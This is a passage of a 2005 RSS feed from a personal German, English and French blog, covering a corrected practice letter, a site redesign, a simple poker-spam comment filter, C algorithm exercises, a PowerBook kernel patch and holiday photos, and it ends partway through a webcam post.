  9791. Since you're coming from Luzern there aren't any trains <del>at</del><ins>after</ins> midnight. But this isn't a problem, I'll organize a bed for you.
  9792. </p>
  9793. <p>
  9794. If you're not to<ins>o</ins> tired after the concert, we could go out to the city and visit some discos.
  9795. </p>
  9796. <p>Hope you'll come to the concert.</p>
  9797. <p>Best wishes</p>
  9798. <p>Andreas</p>
  9799. </blockquote>
  9800. ]]></description>
  9801.    <content:encoded><![CDATA[<p>
  9802. Since I didn't have English courses for almost five years and since I
  9803. plan to do an exchange year in 2006/2007, I'm actually following an
  9804. English preparation course for the Cambridge First Certificate in
  9805. English (FCE) with the target to do the certificate in July 2006.<br>The course is hold at the language center of the EPFL and is also paid by the EPFL (only the course, not the certificate).</p>
  9806. <p>
  9807. It seems that for the course I have to write a sample letter each week.
  9808. I thought this would be a good oppurtunity to easily add some English
  9809. content to this weblog and this way there are much more people who can
  9810. find mistakes and eventually give me some hints on how to improve my
  9811. writing skills :-)
  9812. </p>
  9813. <p>
  9814. There we go, here is the first letter we had to write, already with the corrections.
  9815. </p>
  9816. <br><br>
  9817. <blockquote>
  9818. <p>Dear Thomas,</p>
  9819. <p>
  9820. <del>Like</del><ins>As</ins> you probably know, I help at <ins>the</ins> &quot;Satellite&quot; and we're organizing a concert tomorrow.<br>
  9821. It's a concert <del>of</del><ins>with</ins> two post-rock groups called &quot;Rosqo&quot; and &quot;Beautiful Leopard&quot;.
  9822. </p>
  9823. <p>
  9824. &quot;Satellite&quot; is located on the second floor of the &quot;CM&quot; building of <ins>the</ins> EPFL. The concert starts at eight o'clock and finishes around midnight.
  9825. </p>
  9826. <p>
  9827. It seems that the two groups are quite popular, so please tell me if you can come as <del>fast</del><ins>soon</ins> as possible, so that I can reserve a ticket for you.
  9828. </p>
  9829. <p>
  9830. Since you're coming from Luzern there aren't any trains <del>at</del><ins>after</ins> midnight. But this isn't a problem, I'll organize a bed for you.
  9831. </p>
  9832. <p>
  9833. If you're not to<ins>o</ins> tired after the concert, we could go out to the city and visit some discos.
  9834. </p>
  9835. <p>Hope you'll come to the concert.</p>
  9836. <p>Best wishes</p>
  9837. <p>Andreas</p>
  9838. </blockquote>
  9839. ]]></content:encoded>
  9840.  </item>
  9842.  <item>
  9843.    <title>CSS Reboot Fall 2005</title>
  9844.    <link></link>
  9845.    <guid isPermaLink="true"></guid>
  9846.    <dc:creator>Andreas Jaggi</dc:creator>
  9847.    <creativeCommons:license></creativeCommons:license>
  9848.    <pubDate>Tue, 01 Nov 2005 00:00:00 +0100</pubDate>
  9849.    <category domain="">Webdesign</category>
  9850.    <description><![CDATA[<p>Am Wochenende bin ich per Zufall auf die <a href="" title="CSS Reboot Fall 2005">CSS Reboot</a> Seite gestossen.<br>Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)</p>
  9852. <p>Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte <s>hier klicken</s> um zum neuen zu wechseln.</p>
  9854. <p>In <a href="" title="Spread Firefox | Igniting the web">Mozilla Firefox</a>, <a href="" title="Opera Web Browser">Opera</a> und <a href="" title="Apple - Safari">Safari</a> sieht die Seite ziemlich genau so aus wie gewünscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(</p>
  9855. ]]></description>
  9856.    <content:encoded><![CDATA[<p>Am Wochenende bin ich per Zufall auf die <a href="" title="CSS Reboot Fall 2005">CSS Reboot</a> Seite gestossen.<br>Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)</p>
  9858. <p>Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte <s>hier klicken</s> um zum neuen zu wechseln.</p>
  9860. <p>In <a href="" title="Spread Firefox | Igniting the web">Mozilla Firefox</a>, <a href="" title="Opera Web Browser">Opera</a> und <a href="" title="Apple - Safari">Safari</a> sieht die Seite ziemlich genau so aus wie gewünscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(</p>
  9861. ]]></content:encoded>
  9862.  </item>
  9864.  <item>
  9865.    <title>Lancer le bâton</title>
  9866.    <link></link>
  9867.    <guid isPermaLink="true"></guid>
  9868.    <dc:creator>Andreas Jaggi</dc:creator>
  9869.    <creativeCommons:license></creativeCommons:license>
  9870.    <pubDate>Sun, 30 Oct 2005 00:18:13 +0200</pubDate>
  9871.    <category domain="">Misc</category>
  9872.    <description><![CDATA[<p><a href="" title="Und jetzt französisch">Markus</a> bewirft mich wegen den Französischkenntnissen mit Stöckchen!</p>
  9874. <blockquote lang="fr" cite="">
  9875. <ol>
  9876. <li>Allez dans vos archives.</li>
  9878. <li>Retrouvez la 23e note ou celle proche de ce chiffre.</li>
  9880. <li>Retrouvez la 5e phrase.</li>
  9882. <li>Affichez le texte de la phrase ainsi que ces instructions.</li>
  9884. <li>Demandez &#224; 5 personnes que vous aimez lire d&#8217;en faire autant.</li>
  9885. </ol>
  9886. </blockquote>
  9888. <p>Voil&#224;, der fünfte Satz aus dem <a href="" title="Endlich...">dreiundzwanzigsten Eintrag</a>:</p>
  9890. <blockquote cite=""><p><b>Yeehaw!</b></p>
  9891. </blockquote>
  9893. <p>Das Stöckchen an fünf Personen weiterreichen, welche ich gerne lese?<br>
  9894. Mal schauen was die Linkliste so hergibt:</p>
  9896. <ul>
  9897. <li><a href="#" title="" class="gone">Andreas</a></li>
  9899. <li><a href="" title="Pepilog">Pepino</a></li>
  9901. <li><a href="" title="metamorphine (">dee</a></li>
  9903. <li><a href="" title="mindtrap::weblog (">Gordon</a></li>
  9905. <li><a href="" title="">Flo</a></li>
  9906. </ul>
  9907. ]]></description>
  9908.    <content:encoded><![CDATA[<p><a href="" title="Und jetzt französisch">Markus</a> bewirft mich wegen den Französischkenntnissen mit Stöckchen!</p>
  9910. <blockquote lang="fr" cite="">
  9911. <ol>
  9912. <li>Allez dans vos archives.</li>
  9914. <li>Retrouvez la 23e note ou celle proche de ce chiffre.</li>
  9916. <li>Retrouvez la 5e phrase.</li>
  9918. <li>Affichez le texte de la phrase ainsi que ces instructions.</li>
  9920. <li>Demandez &#224; 5 personnes que vous aimez lire d&#8217;en faire autant.</li>
  9921. </ol>
  9922. </blockquote>
  9924. <p>Voil&#224;, der fünfte Satz aus dem <a href="" title="Endlich...">dreiundzwanzigsten Eintrag</a>:</p>
  9926. <blockquote cite=""><p><b>Yeehaw!</b></p>
  9927. </blockquote>
  9929. <p>Das Stöckchen an fünf Personen weiterreichen, welche ich gerne lese?<br>
  9930. Mal schauen was die Linkliste so hergibt:</p>
  9932. <ul>
  9933. <li><a href="#" title="" class="gone">Andreas</a></li>
  9935. <li><a href="" title="Pepilog">Pepino</a></li>
  9937. <li><a href="" title="metamorphine (">dee</a></li>
  9939. <li><a href="" title="mindtrap::weblog (">Gordon</a></li>
  9941. <li><a href="" title="">Flo</a></li>
  9942. </ul>
  9943. ]]></content:encoded>
  9944.  </item>
  9946.  <item>
  9947.    <title>Démos d'AJAX</title>
  9948.    <link></link>
  9949.    <guid isPermaLink="true"></guid>
  9950.    <dc:creator>Andreas Jaggi</dc:creator>
  9951.    <creativeCommons:license></creativeCommons:license>
  9952.    <pubDate>Fri, 09 Sep 2005 14:39:59 +0200</pubDate>
  9953.    <category domain="">Webdesign</category>
  9954.    <description><![CDATA[<p>Voil&#233; quelques liens vers des d&#233;mos d&#8217;AJAX.</p>
  9956. <ul>
  9957. <li><a href="" title="Demos in Wiki (">Demos in Wiki</a></li>
  9959. <li><a href="" title="RSSReader (">RSSReader</a></li>
  9961. <li><a href="" title="Couloir (">Couloir</a></li>
  9963. <li><a href="" title="TiddlyWiki">TiddlyWiki</a></li>
  9965. <li><a href="" title="JS/UIX - Terminal">JS/UIX - Terminal</a></li>
  9967. <li><a href="" title="Rico (">Rico</a></li>
  9969. <li><a href="" title="Ajax Status Wiki Demo (">Ajax Status Wiki Demo</a></li>
  9971. <li><a href="" title="Backbase AJAX RSS Reader (">Backbase AJAX RSS Reader</a></li>
  9973. <li><a href="" title="The Form Assembly Garden (">The Form Assembly Garden</a></li>
  9975. <li><a href="" title="Jalenacks AJAX Periodic Table of the Elements (">Jalenack&#8217;s AJAX Periodic Table of the Elements</a></li>
  9977. <li><a href="" title=" ("></a></li>
  9979. <li><a href="" title="MochiKit - Demos">MochiKit - Demos</a></li>
  9981. <li><a href="" title="Ajax Examples - Ajax Patterns (">Ajax Examples - Ajax Patterns</a></li>
  9982. </ul>
  9983. ]]></description>
  9984.    <content:encoded><![CDATA[<p>Voil&#233; quelques liens vers des d&#233;mos d&#8217;AJAX.</p>
  9986. <ul>
  9987. <li><a href="" title="Demos in Wiki (">Demos in Wiki</a></li>
  9989. <li><a href="" title="RSSReader (">RSSReader</a></li>
  9991. <li><a href="" title="Couloir (">Couloir</a></li>
  9993. <li><a href="" title="TiddlyWiki">TiddlyWiki</a></li>
  9995. <li><a href="" title="JS/UIX - Terminal">JS/UIX - Terminal</a></li>
  9997. <li><a href="" title="Rico (">Rico</a></li>
  9999. <li><a href="" title="Ajax Status Wiki Demo (">Ajax Status Wiki Demo</a></li>
  10001. <li><a href="" title="Backbase AJAX RSS Reader (">Backbase AJAX RSS Reader</a></li>
  10003. <li><a href="" title="The Form Assembly Garden (">The Form Assembly Garden</a></li>
  10005. <li><a href="" title="Jalenacks AJAX Periodic Table of the Elements (">Jalenack&#8217;s AJAX Periodic Table of the Elements</a></li>
  10007. <li><a href="" title=" ("></a></li>
  10009. <li><a href="" title="MochiKit - Demos">MochiKit - Demos</a></li>
  10011. <li><a href="" title="Ajax Examples - Ajax Patterns (">Ajax Examples - Ajax Patterns</a></li>
  10012. </ul>
  10013. ]]></content:encoded>
  10014.  </item>
  10016.  <item>
  10017.    <title>Fight Spam</title>
  10018.    <link></link>
  10019.    <guid isPermaLink="true"></guid>
  10020.    <dc:creator>Andreas Jaggi</dc:creator>
  10021.    <creativeCommons:license></creativeCommons:license>
  10022.    <pubDate>Sun, 07 Aug 2005 12:49:48 +0200</pubDate>
  10023.    <category domain="">Coding</category>
  10024.    <description><![CDATA[<p>Since this weblog received about 100 spam comments last week, i implemented a simple spam-filter based on a badwords list.<br>
  10025. If a comments text contains more than four occurences of the following
  10026. words, it won't get added and the user is redirected to the mainpage.</p>
  10028. <p>Thanks to very specific spam content, it only needs a small list of badwords to detect the spam.</p>
  10030. <ul>
  10031. <li>texas</li>
  10033. <li>holdem</li>
  10035. <li>casino</li>
  10037. <li>poker</li>
  10038. </ul>
  10039. <p>This is just a simple anti-spam mechanism, but for now it works perfect and i hope it remains so for a long time :-)</p>
  10040. ]]></description>
  10041.    <content:encoded><![CDATA[<p>Since this weblog received about 100 spam comments last week, i implemented a simple spam-filter based on a badwords list.<br>
  10042. If a comments text contains more than four occurences of the following
  10043. words, it won't get added and the user is redirected to the mainpage.</p>
  10045. <p>Thanks to very specific spam content, it only needs a small list of badwords to detect the spam.</p>
  10047. <ul>
  10048. <li>texas</li>
  10050. <li>holdem</li>
  10052. <li>casino</li>
  10054. <li>poker</li>
  10055. </ul>
  10056. <p>This is just a simple anti-spam mechanism, but for now it works perfect and i hope it remains so for a long time :-)</p>
  10057. ]]></content:encoded>
  10058.  </item>
  10060.  <item>
  10061.    <title>Les Landes 2005 - Teil 1</title>
  10062.    <link></link>
  10063.    <guid isPermaLink="true"></guid>
  10064.    <dc:creator>Andreas Jaggi</dc:creator>
  10065.    <creativeCommons:license></creativeCommons:license>
  10066.    <pubDate>Mon, 01 Aug 2005 02:08:02 +0200</pubDate>
  10067.    <category domain="">Misc</category>
  10068.    <description><![CDATA[<p><q>Um 20.30h fängt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fährt, reichts noch!</q><br>
  10069. Und so habe ich mir am Freitag vor zwei Wochen noch schnell <a href="" title="Mehr über den Film bei IMDb">Mr. &amp; Mrs. Smith</a>
  10070. angeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,
  10071. musste ich mich beeilen um noch meine Sachen zu packen damit wir um
  10072. vier Uhr morgens in Richtung Frankreich losfahren konnten.
  10073. Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes in
  10074. Moustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibts
  10075. diesmal sogar ein paar Bilder.</p>
  10076. <br><br>
  10077. <dl class="tdl">
  10078. <dt class="tdla">
  10079. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Blick zur Tür hinaus" title="Klick für grössere Ansicht"></a>
  10080. </dt>
  10081. <dd class="tdla">Blick zur Tür hinaus</dd>
  10082. <dt class="tdlb">
  10083. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Les Landes ist voller Pinien" title="Klick für grössere Ansicht"></a>
  10084. </dt>
  10085. <dd class="tdlb">Les Landes ist voller Pinien</dd>
  10086. <dt class="tdla">
  10087. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Pomme de pin" title="Klick für grössere Ansicht"></a>
  10088. </dt>
  10089. <dd class="tdla">Pomme de pin</dd>
  10090. <dt class="tdlb">
  10091. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Ein Glühwürmchen photographiert mit Infrarot" title="Klick für grössere Ansicht"></a>
  10092. </dt>
  10093. <dd class="tdlb">Ein Glühwürmchen photographiert mit Infrarot</dd>
  10094. <dt class="tdla">
  10095. <a href="" title="Klick für grössere Ansicht"><img src="" alt="und mit Blitzlicht" title="Klick für grössere Ansicht"></a>
  10096. </dt>
  10097. <dd class="tdla">und mit Blitzlicht</dd>
  10098. <dt class="tdlb">
  10099. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  10100. </dt>
  10101. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  10102. <dt class="tdla">
  10103. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 10 Sekunden" title="Klick für grössere Ansicht"></a>
  10104. </dt>
  10105. <dd class="tdlb">Mond, Belichtungszeit 10 Sekunden</dd>
  10106. <dt class="tdlb">
  10107. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  10108. </dt>
  10109. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  10110. <dt class="tdla">
  10111. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Eine Eidechse" title="Klick für grössere Ansicht"></a>
  10112. </dt>
  10113. <dd class="tdla">Eine Eidechse</dd>
  10114. <dt class="tdlb">
  10115. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Zwei Eidechsen" title="Klick für grössere Ansicht"></a>
  10116. </dt>
  10117. <dd class="tdlb">Zwei Eidechsen</dd>
  10118. <dt class="tdla">
  10119. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Spezieller Grashüpfer" title="Klick für grössere Ansicht"></a>
  10120. </dt>
  10121. <dd class="tdla">Spezieller Grashüpfer</dd>
  10122. <dt class="tdlb">
  10123. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10124. </dt>
  10125. <dd class="tdlb">Auf dem Rückweg überquerten wir den <a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10126. <dt class="tdla">
  10127. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10128. </dt>
  10129. <dd class="tdla"><a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10130. <dt class="tdlb">
  10131. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10132. </dt>
  10133. <dd class="tdlb"><a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10134. <dt class="tdla">
  10135. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Brücke von Les Vignes" title="Klick für grössere Ansicht"></a>
  10136. </dt>
  10137. <dd class="tdla">Brücke von Les Vignes</dd>
  10138. <dt class="tdlb">
  10139. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Felsformation bei Les Vignes" title="Klick für grössere Ansicht"></a>
  10140. </dt>
  10141. <dd class="tdlb">Felsformation bei Les Vignes</dd>
  10142. <dt class="tdlb">
  10143. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Ferienlektüre" title="Klick für grössere Ansicht"></a>
  10144. </dt>
  10145. <dd class="tdlb">Ferienlektüre</dd>
  10146. <dt class="tdla">
  10147. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Hängematte" title="Klick für grössere Ansicht"></a>
  10148. </dt>
  10149. <dd class="tdlb"></dd>
  10150. </dl>
  10152. ]]></description>
  10153.    <content:encoded><![CDATA[<p><q>Um 20.30h fängt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fährt, reichts noch!</q><br>
  10154. Und so habe ich mir am Freitag vor zwei Wochen noch schnell <a href="" title="Mehr über den Film bei IMDb">Mr. &amp; Mrs. Smith</a>
  10155. angeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,
  10156. musste ich mich beeilen um noch meine Sachen zu packen damit wir um
  10157. vier Uhr morgens in Richtung Frankreich losfahren konnten.
  10158. Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes in
  10159. Moustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibts
  10160. diesmal sogar ein paar Bilder.</p>
  10161. <br><br>
  10162. <dl class="tdl">
  10163. <dt class="tdla">
  10164. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Blick zur Tür hinaus" title="Klick für grössere Ansicht"></a>
  10165. </dt>
  10166. <dd class="tdla">Blick zur Tür hinaus</dd>
  10167. <dt class="tdlb">
  10168. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Les Landes ist voller Pinien" title="Klick für grössere Ansicht"></a>
  10169. </dt>
  10170. <dd class="tdlb">Les Landes ist voller Pinien</dd>
  10171. <dt class="tdla">
  10172. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Pomme de pin" title="Klick für grössere Ansicht"></a>
  10173. </dt>
  10174. <dd class="tdla">Pomme de pin</dd>
  10175. <dt class="tdlb">
  10176. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Ein Glühwürmchen photographiert mit Infrarot" title="Klick für grössere Ansicht"></a>
  10177. </dt>
  10178. <dd class="tdlb">Ein Glühwürmchen photographiert mit Infrarot</dd>
  10179. <dt class="tdla">
  10180. <a href="" title="Klick für grössere Ansicht"><img src="" alt="und mit Blitzlicht" title="Klick für grössere Ansicht"></a>
  10181. </dt>
  10182. <dd class="tdla">und mit Blitzlicht</dd>
  10183. <dt class="tdlb">
  10184. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  10185. </dt>
  10186. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  10187. <dt class="tdla">
  10188. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 10 Sekunden" title="Klick für grössere Ansicht"></a>
  10189. </dt>
  10190. <dd class="tdlb">Mond, Belichtungszeit 10 Sekunden</dd>
  10191. <dt class="tdlb">
  10192. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  10193. </dt>
  10194. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  10195. <dt class="tdla">
  10196. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Eine Eidechse" title="Klick für grössere Ansicht"></a>
  10197. </dt>
  10198. <dd class="tdla">Eine Eidechse</dd>
  10199. <dt class="tdlb">
  10200. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Zwei Eidechsen" title="Klick für grössere Ansicht"></a>
  10201. </dt>
  10202. <dd class="tdlb">Zwei Eidechsen</dd>
  10203. <dt class="tdla">
  10204. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Spezieller Grashüpfer" title="Klick für grössere Ansicht"></a>
  10205. </dt>
  10206. <dd class="tdla">Spezieller Grashüpfer</dd>
  10207. <dt class="tdlb">
  10208. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10209. </dt>
  10210. <dd class="tdlb">Auf dem Rückweg überquerten wir den <a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10211. <dt class="tdla">
  10212. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10213. </dt>
  10214. <dd class="tdla"><a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10215. <dt class="tdlb">
  10216. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  10217. </dt>
  10218. <dd class="tdlb"><a href="" title="Viaduc de Millau (">Viaduc de Millau</a></dd>
  10219. <dt class="tdla">
  10220. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Brücke von Les Vignes" title="Klick für grössere Ansicht"></a>
  10221. </dt>
  10222. <dd class="tdla">Brücke von Les Vignes</dd>
  10223. <dt class="tdlb">
  10224. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Felsformation bei Les Vignes" title="Klick für grössere Ansicht"></a>
  10225. </dt>
  10226. <dd class="tdlb">Felsformation bei Les Vignes</dd>
  10227. <dt class="tdlb">
  10228. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Ferienlektüre" title="Klick für grössere Ansicht"></a>
  10229. </dt>
  10230. <dd class="tdlb">Ferienlektüre</dd>
  10231. <dt class="tdla">
  10232. <a href="" title="Klick für grössere Ansicht"><img src="" alt="Hängematte" title="Klick für grössere Ansicht"></a>
  10233. </dt>
  10234. <dd class="tdlb"></dd>
  10235. </dl>
  10237. ]]></content:encoded>
  10238.  </item>
  10240.  <item>
  10241.    <title>Knapsack 0/1 and sorting algorithms</title>
  10242.    <link></link>
  10243.    <guid isPermaLink="true"></guid>
  10244.    <dc:creator>Andreas Jaggi</dc:creator>
  10245.    <creativeCommons:license></creativeCommons:license>
  10246.    <pubDate>Sat, 02 Jul 2005 01:56:12 +0200</pubDate>
  10247.    <category domain="">Coding</category>
  10248.    <description><![CDATA[<p>As an exercice for the algorithm test of next monday i implemented some algorithms in C.<br>
  10249. There are: </p>
  10251. <ul>
  10252. <li><a href="" title="Gnome sort on Wikipedia">gnome sort</a></li>
  10254. <li><a href="" title="Insertion sort on Wikipedia">insertion sort</a></li>
  10256. <li><a href="" title="Selection sort on Wikipedia">selection sort</a></li>
  10258. <li><a href="" title="Shell sort on Wikipedia">shell sort</a></li>
  10260. <li><a href="" title="Merge sort on Wikipedia">merge sort</a></li>
  10262. <li><a href="" title="Bubble sort on Wikipedia">bubble sort</a></li>
  10264. <li><a href="" title="Quicksort on Wikipedia">quicksort</a></li>
  10266. <li><a href="" title="Heapsort on Wikipedia">heapsort</a></li>
  10268. <li><a href="" title="Knapsack on Wikipedia">knapsack</a> 0/1 algorithm</li>
  10269. </ul>
  10271. <p>The source code is available under the BSD License:</p>
  10273. <ul>
  10274. <li><a href="" title="Source code of sort.c">sorting algorithms</a><br>
  10276. </li>
  10278. <li><a href="" title="Source code of knapsack01.c">knapsack 0/1 algorithm</a>
  10279.    <br>
  10280. </li>
  10281. </ul>
  10282. ]]></description>
  10283.    <content:encoded><![CDATA[<p>As an exercice for the algorithm test of next monday i implemented some algorithms in C.<br>
  10284. There are: </p>
  10286. <ul>
  10287. <li><a href="" title="Gnome sort on Wikipedia">gnome sort</a></li>
  10289. <li><a href="" title="Insertion sort on Wikipedia">insertion sort</a></li>
  10291. <li><a href="" title="Selection sort on Wikipedia">selection sort</a></li>
  10293. <li><a href="" title="Shell sort on Wikipedia">shell sort</a></li>
  10295. <li><a href="" title="Merge sort on Wikipedia">merge sort</a></li>
  10297. <li><a href="" title="Bubble sort on Wikipedia">bubble sort</a></li>
  10299. <li><a href="" title="Quicksort on Wikipedia">quicksort</a></li>
  10301. <li><a href="" title="Heapsort on Wikipedia">heapsort</a></li>
  10303. <li><a href="" title="Knapsack on Wikipedia">knapsack</a> 0/1 algorithm</li>
  10304. </ul>
  10306. <p>The source code is available under the BSD License:</p>
  10308. <ul>
  10309. <li><a href="" title="Source code of sort.c">sorting algorithms</a><br>
  10311. </li>
  10313. <li><a href="" title="Source code of knapsack01.c">knapsack 0/1 algorithm</a>
  10314.    <br>
  10315. </li>
  10316. </ul>
  10317. ]]></content:encoded>
  10318.  </item>
  10320.  <item>
  10321.    <title>rl and rs</title>
  10322.    <link></link>
  10323.    <guid isPermaLink="true"></guid>
  10324.    <dc:creator>Andreas Jaggi</dc:creator>
  10325.    <creativeCommons:license></creativeCommons:license>
  10326.    <pubDate>Thu, 30 Jun 2005 22:01:55 +0200</pubDate>
  10327.    <category domain="">Coding</category>
  10328.    <description><![CDATA[<p><code>rl</code> and <code>rs</code> are two small command-line programs written in C.</p>
  10330. <ul>
  10331. <li><code>rl</code> removes starting line(s) from stdin.</li>
  10333. <li><code>rs</code> reverses it's input.</li>
  10334. </ul>
  10336. <p>The source code is available under the BSD License:</p>
  10338. <ul>
  10339. <li><a href="" title="Download the source code for rl">rl.c</a></li>
  10341. <li><a href="" title="Download the source code for rs">rs.c</a></li>
  10342. </ul>
  10343. ]]></description>
  10344.    <content:encoded><![CDATA[<p><code>rl</code> and <code>rs</code> are two small command-line programs written in C.</p>
  10346. <ul>
  10347. <li><code>rl</code> removes starting line(s) from stdin.</li>
  10349. <li><code>rs</code> reverses it's input.</li>
  10350. </ul>
  10352. <p>The source code is available under the BSD License:</p>
  10354. <ul>
  10355. <li><a href="" title="Download the source code for rl">rl.c</a></li>
  10357. <li><a href="" title="Download the source code for rs">rs.c</a></li>
  10358. </ul>
  10359. ]]></content:encoded>
  10360.  </item>
  10362.  <item>
  10363.    <title>linux-</title>
  10364.    <link></link>
  10365.    <guid isPermaLink="true"></guid>
  10366.    <dc:creator>Andreas Jaggi</dc:creator>
  10367.    <creativeCommons:license></creativeCommons:license>
  10368.    <pubDate>Sun, 17 Apr 2005 17:58:42 +0200</pubDate>
  10369.    <category domain="">Linux</category>
  10370.    <description><![CDATA[<p>Da gerade mein <a title="" href="">Kernel</a> &quot;geupdatet&quot; wird, habe ich den Patch zur Unterstützung der PowerBook Buttons an die <a title="linux-" href="">aktuelle Kernelversion angepasst</a>.</p>
  10372. <p>Bei dieser Gelegenheit habe ich den neuen Patch an ein paar
  10373. Kernelentwickler geschickt, vielleicht schafft er's diesmal bis in den
  10374. &quot;offiziellen&quot; Kernel.
  10375. </p>
  10377. <p><b>Update:</b><br>
  10378. Der Patch hat's bis zu Linus geschafft (<a title="[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4" href=";a=commit;h=146a4b3bdfb5641bfbf975e29680b482b8b343ba">[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4</a>), wird also in der nächsten Kernelversion dabei sein :-)</p>
  10379. ]]></description>
  10380.    <content:encoded><![CDATA[<p>Da gerade mein <a title="" href="">Kernel</a> &quot;geupdatet&quot; wird, habe ich den Patch zur Unterstützung der PowerBook Buttons an die <a title="linux-" href="">aktuelle Kernelversion angepasst</a>.</p>
  10382. <p>Bei dieser Gelegenheit habe ich den neuen Patch an ein paar
  10383. Kernelentwickler geschickt, vielleicht schafft er's diesmal bis in den
  10384. &quot;offiziellen&quot; Kernel.
  10385. </p>
  10387. <p><b>Update:</b><br>
  10388. Der Patch hat's bis zu Linus geschafft (<a title="[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4" href=";a=commit;h=146a4b3bdfb5641bfbf975e29680b482b8b343ba">[PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4</a>), wird also in der nächsten Kernelversion dabei sein :-)</p>
  10389. ]]></content:encoded>
  10390.  </item>
  10392.  <item>
  10393.    <title>Webcam</title>
  10394.    <link></link>
  10395.    <guid isPermaLink="true"></guid>
  10396.    <dc:creator>Andreas Jaggi</dc:creator>
  10397.    <creativeCommons:license></creativeCommons:license>
  10398.    <pubDate>Sun, 03 Apr 2005 11:02:00 +0200</pubDate>
  10399.    <category domain="">Misc</category>
  10400.    <description><![CDATA[<a title="Webcam" href=""><img width="352" height="288" src="" alt="Webcam" title="Webcam"></a>
  10401. ]]></description>
  10402.    <content:encoded><![CDATA[<a title="Webcam" href=""><img width="352" height="288" src="" alt="Webcam" title="Webcam"></a>
  10403. ]]></content:encoded>
  10404.  </item>
  10406.  <item>
  10407.    <title>Typhoon Webshot II und Linux</title>
  10408.    <link></link>
  10409.    <guid isPermaLink="true"></guid>
  10410.    <dc:creator>Andreas Jaggi</dc:creator>
  10411.    <creativeCommons:license></creativeCommons:license>
  10412.    <pubDate>Fri, 01 Apr 2005 23:15:22 +0200</pubDate>
  10413.    <category domain="">Linux</category>
  10414.    <description><![CDATA[<a href="" style="border: 0px none ;" title="Typhoon Webshot II (Klick für grössere Ansicht)"><img width="290" height="158" src="" alt="Typhoon Webshot II (Thumbnail)" title="Typhoon Webshot II (Klick für grössere Ansicht)" style="border: 0px none ;"></a>
  10415. <p>Heute habe ich beim Einkaufen diese 'Webcam' entdeckt. Für 29.90 CHF
  10416. (~20&#8364;) bietet sie bis zu 30 640&#215;480 Pixel grosse Bilder pro Sekunde.
  10417. Mit dabei eine CD mit Treiber für Windows 98 bis XP.
  10418. </p>
  10420. <p>Als ich sie an mein Linux-PowerBook anschloss sagte mir <code>dmesg</code> nur gerade diese zwei Zeilen:
  10421. </p>
  10423. <pre><code>ohci_hcd 0001:01:1b.0: remote wakeup
  10424. usb 3-1: new full speed USB device using address 2</code></pre>
